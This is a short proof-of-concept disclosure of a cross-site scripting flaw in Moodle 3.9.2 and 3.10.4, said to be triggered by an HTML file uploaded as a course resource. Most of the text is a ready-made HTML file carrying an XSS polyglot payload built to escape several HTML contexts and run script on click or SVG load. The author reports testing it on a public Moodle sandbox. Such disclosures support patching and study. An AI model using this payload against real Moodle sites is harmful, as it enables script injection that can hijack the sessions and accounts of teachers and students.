This PoC describe how to exploit XSS on Moodle 3.9.2, 3.10.4 with Polyglot payload.
When creating a course, you can upload HTML files as a resource. When uploading an HTML file containing an <input>
tag that has an XSS polyglot payload as "value" it is possible to perform a Cross-Site Scripting.
Version affected: tested on Moodle 3.9.2 and 3.10.4
CVE ID: 2021-3558
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>POC XSS Moodle</title>
</head>
<body>
<h1>POC XSS Moodle</h1>
<input type="text" value="
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"></input>
</body>
</html>
My PoC
On version 3.9.2
On version 3.10.4 (tested on https://sandbox.moodledemo.net/ as teacher, student and guest)